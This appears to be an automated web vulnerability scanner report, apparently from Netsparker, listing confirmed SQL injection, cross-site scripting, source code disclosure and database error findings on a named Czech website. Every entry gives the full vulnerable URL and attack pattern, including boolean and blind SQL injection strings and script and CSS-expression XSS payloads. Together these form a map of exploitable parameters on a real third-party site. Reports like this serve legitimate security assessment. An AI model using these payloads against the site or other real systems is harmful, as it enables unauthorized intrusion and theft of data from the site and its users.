- ||| Boolean Based SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk=2&id_od=2 AND 'NS='ss
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id_od
- Parameter Type: Querystring
- Attack Pattern: 2 AND 'NS='ss
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_text.php?slovo=3&id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- ||| [High Possibility] SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk=%27&id_od=2
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: idk
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk=2&id_od=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id_od
- Parameter Type: Querystring
- Attack Pattern: %27
- ||| XSS (Cross-site Scripting)
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk='><script>alert(9)</script>&id_od=2
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: idk
- Parameter Type: Querystring
- Attack Pattern: '><script>alert(9)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php?ap=hled&hledej=8&najdi=Vyhledej&retezec='"--></style></script><script>alert(0x000222)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: retezec
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000222)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php3?id=" stYle="x:expre/**/ssion(alert(9)) &slovo=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php3?id=110&slovo=" stYle=x:expre/**/ssion(alert(9)) ns="
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php?id=" stYle=x:expre/**/ssion(alert(9)) ns=" &slovo=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php3?slovo=" stYle=x:expre/**/ssion(alert(9)) ns="
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/odskok/o_f_pratele.php?url='"--></style></script><script>alert(0x0003BC)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: url
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0003BC)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/odskok/o_f_znamka.php?id_od='"--></style></script><script>alert(0x0003CF)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id_od
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0003CF)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/odskok/o_f_pratele.php?url='"--></style></script><script>alert(0x000447)</script>&name=Mobile
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: url
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000447)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/br.php?brana=" stYle="x:expre/**/ssion(alert(9)) &co=1
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: brana
- Parameter Type: Querystring
- Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php?id=498&slovo=" stYle=x:expre/**/ssion(alert(9)) ns="
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/odskok/o_f_pratele.php?url='"--></style></script><script>alert(0x0004B0)</script>&a_bid=59
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: url
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0004B0)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/nove_o_hry.php?url=" stYle=x:expre/**/ssion(alert(9)) ns="
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: url
- Parameter Type: Querystring
- Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: datum
- Parameter Type: Post
- Attack Pattern: --><script>alert(9)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: "><script>alert(9)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/br.php?brana=1&co=" stYle=x:expre/**/ssion(alert(9)) ns="
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: co
- Parameter Type: Querystring
- Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
- ||| [Possible] Cross-site Scripting
- Severity : Medium
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_text.php3?slovo='"--></style></script><script>alert(0x0004F6)</script>&id=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Notes: This page responds with an HTTP redirect status, so the detected XSS vulnerability might not be exploitable in many conditions; however, it still indicates a lack of correct filtering and should be addressed.
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x0004F6)</script>
- Severity : Medium
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_text.php?slovo='"--></style></script><script>alert(0x00050F)</script>&id=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Notes: This page responds with an HTTP redirect status, so the detected XSS vulnerability might not be exploitable in many conditions; however, it still indicates a lack of correct filtering and should be addressed.
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x00050F)</script>
- ||| [Possible] PHP Source Code Disclosure
- Severity : Medium
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_menu.html
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- ||| Database Error Message
- Severity : Low
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_text.php3?slovo=&id=
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- ||| MySQL Database Identified
- Severity : Information
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk=2&id_od=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))
- Parameter Name: id_od
- Parameter Type: Querystring
- Attack Pattern: -1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))